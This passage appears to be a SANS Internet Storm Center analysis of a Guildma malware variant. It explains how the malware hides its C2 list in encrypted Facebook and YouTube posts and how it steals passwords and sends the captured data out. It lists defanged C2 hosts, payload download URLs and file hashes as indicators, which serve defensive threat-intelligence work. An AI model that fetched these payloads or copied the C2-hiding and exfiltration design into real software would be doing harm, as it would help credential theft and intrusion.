Following two of the requested Facebook and YouTube URLs, we reached the following content:

Facebook post with suspicious content
YouTube profile "about" section

The suspicious content, between "|||" marks, is base64 encoded. However, simple decoding isn't enough, as the data is encrypted as well. For example, base64 decoding the sequence "Sm5EblBrT25HbkluRm5BbVVtU25…" results in "JnDnPkOnGnInFnAmUm…", which is not meaningful.

Analyzing the malware code a little deeper, specifically at the moment it reaches the Facebook and YouTube URLs, it was possible to understand the decryption process and reverse it.

Facebook and Youtube posts decryption

To make things easy, we created a Python script to automate the job, as seen below.

Python script to decrypt C2 list and commands

Applying this decryption function to one of this campaign's Facebook posts, we got a list of multiple addresses that would later be used by the malware as C2 servers:

"my-project-proxy-1-249108.appspot.com;my-project-novo-3-proxy.appspot.com;my-project-proxy-2.appspot.com;my-project-proxy-4.appspot.com;my-project-proxy-5.appspot.com;my-project-proxy-6.appspot.com;my-project-proxy-7.appspot.com;my-project-proxy-8.appspot.com;"

It's important to note that this is just part of the C2 addresses used in this campaign. Thanks to Facebook's edit history feature, it was possible to decrypt all messages from June 30, 2019, to now.

The result is a list of 76 unique C2 servers.

Editing History

7. Running information stealers

Once the C2 addresses are loaded, the malware starts loading the information stealer modules. The code for each information stealer is decrypted from the dropped files, like "halawxtza.jpg", and instantiated as child processes.

One of the modules focuses on stealing passwords stored in different applications, like web browsers and e-mail clients, as seen below.

Password Stealer module

The captured information, including screen captures, is encrypted and stored in files under the path "C:\Users\Public\Libraries\win32", as seen below.

Captured data

8. Data exfiltration

The captured data is sent to one of the C2 servers retrieved in step 6. 

In the example below, the information is sent to C2 “soy-tower-248822[.]appspot[.]com” via HTTPS. 

Data Exfiltration

In addition to SSL, the exfiltrated data receives two layers of encryption: one to tell the C2 the filename and the other for its content.

Exfiltrated data

Final comments

This sample shows us the importance of truly understanding threats' TTPs (Tactics, Techniques, and Procedures) in addition to simply using IP and file hash indicators; it reminds me of the Pyramid of Pain concept [5]. An environment infected with this variant of Guildma that relies solely on blocking C2 IP addresses as they are discovered would not stop the threat, as fresh C2 addresses may be continually retrieved from apparently trusted sources.

Facebook and YouTube were notified about the profiles involved in this malicious campaign.

IOCs

C2 list:


Facebook and YouTube URLs

https://www[.]youtube[.]com/channel/UCTN4wLOwIUoebHmPQM47Yzw/about
https://www[.]youtube[.]com/channel/UC1mMPPv6X7LzvPGOWQmT9hg/about
https://www[.]youtube[.]com/channel/UCEhLqZZR0oXsNCtQT1zEi9w/about
https://www[.]facebook[.]com/permalink[.]php?story_fbid=1233322216856141&id=1233309900190706
https://www[.]facebook[.]com/permalink[.]php?story_fbid=850799741943857&id=100010415162411

Hashes

halawxtzxb.~
MD5: 6c81fa46dd6762b69c1651125946e063
SHA1: c665466e12ede25c97279f81668f5975ed4be93c
SHA256: 2b2acd79f309d6453b319c2c0250b599d2a26f2c65a6b6a231a6157e96f4feac
Size (bytes): 316536

halawxtzxa.~
MD5: 9411341b781aa43b66b8f83658d5011b
SHA1: 1962486f3b1b48ad576b752618d41839a1470a77
SHA256: 89f1fba39982ca09a8b329f82a46b34d5f8caf21bfe72940650186391bc6d095
Size (bytes): 325000

halawxtzgx.gif
MD5: a3dd42e226ace4c09e23163b524282ac
SHA1: a53ee4d5095fc25f8867de1d6863fe4ab14e851f
SHA256: 606b3711828a7d82b16217f345715550d92a3871ee2cf6f901751292f164ef69
Size (bytes): 646656

halawxtzg.gif
MD5: 897a65519c433c25227cb2eff858f255
SHA1: 8752a5bd75f0cab3cb51e364790b51ebce473d7f
SHA256: 03babea27593c3bb0fda41b7cbd2749062a17319d50496db71fcca1e1007c191
Size (bytes): 1017344

halawxtzdx.gif
MD5: 5ee713a85d8a8893f28ccd909b19a68d
SHA1: 309a33467c312a48aa21f583f87326cef3e04092
SHA256: 8ff034457cc1ad4303772d6650a83b650c9509854a29a36a3218f3a31974999d
Size (bytes): 935936

halawxtzdwwn.gif
MD5: c8997c61f0b4605c082fcbeddf7b49b1
SHA1: 7ea39703c95a14cbe9b72390961ae8ac49863bd1
SHA256: 8f512e6c49da52913b7999234865774e838fa7a668e6f11e1b205604fa89bed4
Size (bytes): 935936

halawxtzc.jpg
MD5: f710033b42c45de9822e5a549adb3624
SHA1: 5230fe9e3d0530cfac6fa100637592b74ce355ed
SHA256: 32c1cf4ac2be99bdda6d3d623975e3f1c9ab24db2869e98e235cf97af62d54fb
Size (bytes): 235520

halawxtzb.jpg
MD5: f2cf0bc2a11c62afa0fd80a3e8cd704d
SHA1: f625e99d236ab4cc1b9d8457a666e2e73f33d525
SHA256: c7f2327af387be23d5a6fc7fa9ddc0ca6e7be180f0588440be9c3efca04a1aac
Size (bytes): 189952

halawxtza.jpg
MD5: 57bbfb7dfbd710aaef209bff71b08a32
SHA1: 9aa5156c212309f4ea61eb6546af3ae33b048651
SHA256: 66c9c650e26635bf9e205e0ebb7b149a69a25f002917a1f9c5360149d423b30e
Size (bytes): 52736

Artifacts download

https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtza[.]jpg[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzb[.]jpg[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzc[.]jpg[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzdwwn[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzdx[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzg[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzgx[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzxa[.]gif[.]zip
https://2d2f292200005ca2200002279c[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/fe81c802287eba49631519d92e168d7d6c6e2f340f0e669198b845a8a639ba1c1late-frost-d978[.]brulefer[.]workers[.]dev/?08/halawxtzxb[.]gif[.]zip
https://13023071da82751cf504af85aa406cd0[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/a0c8767621036a0bfbe3db0beb9ae33612979affe8dd41d7d08af5760a4b4fee1little-bonus-52fc[.]belfegor[.]workers[.]dev/?08/halawxtzhh1a[.]dll[.]zip
https://13023071da82751cf504af85aa406cd0[.]cloudflareworkers[.]com/[.]edgeworker-fiddle-init-preview/a0c8767621036a0bfbe3db0beb9ae33612979affe8dd41d7d08af5760a4b4fee1little-bonus-52fc[.]belfegor[.]workers[.]dev/?08/halawxtzhh1b[.]dll[.]zip

ATT&CK Matrix

References

[1] https://decoded.avast.io/threatintel/deep-dive-into-guildma-malware/
[2] https://ericzimmerman.github.io/#!index.md
[3] https://attack.mitre.org/techniques/T1073/
[4] https://attack.mitre.org/techniques/T1093/
[5] http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html


Renato Marinho
Morphus Labs

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS.
